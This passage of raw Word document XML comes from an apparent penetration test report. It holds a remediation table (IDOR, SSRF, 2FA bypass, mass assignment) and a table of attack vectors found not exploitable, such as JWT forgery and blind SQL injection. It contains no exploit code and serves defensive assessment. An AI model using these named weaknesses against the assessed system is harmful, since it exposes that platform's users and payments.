                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Add rate limiting + auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C3/C7: Auto-approve flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Require document verification + admin review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C11: Payment config unauth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Add authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>H1: Order IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Add user ownership check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>H2: No rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Implement rate limiting on all sensitive endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>H12: Magic link 2FA bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Enforce TOTP 2FA for admin accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C14: SSRF via proof URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Validate against URL allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>H3: Admin JS bundles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Serve only to authenticated admin users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>H6/H7: JWT session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Invalidate on password change, add refresh tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>C4/C26: Role disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Generic 403s without role info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>H19: Mass assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Strict field whitelist on profile updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>M5/M6: Ghost orders + enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Sync gateway DB, fix reset error responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>L6: Downtime claim fraud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Verify account ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>L7: Client-errors injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Validate and sanitize input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Negative Tests (Confirmed Not Exploitable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following attack vectors were tested and confirmed NOT exploitable, included for completeness and to demonstrate the thoroughness of the assessment.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JWT alg:none / RS256 confusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>401 — signatures validated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JWT role claim forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>401 — HS256 signature mismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Mass assignment: role on register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Ignored — role field stripped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Mass assignment: role on PUT/PATCH profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Silently dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Origin bypass on admin endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>500 (CORS crash, not auth bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>X-Role header injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role from JWT only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Amount manipulation (gateway)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Server sets amount from plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Amount manipulation (external gateway)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Server sends correct amount to Squad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Client-side callback_url injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Overridden server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Client-side public_key override</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Overridden server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Path traversal on avatar upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Needs actual image multipart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>NoSQL injection (blind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Uniform 500 responses — no differential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Time-based blind SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Parameterized queries (0.6s baseline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>HMAC timing oracle (webhook)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Variance is network jitter, no byte leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
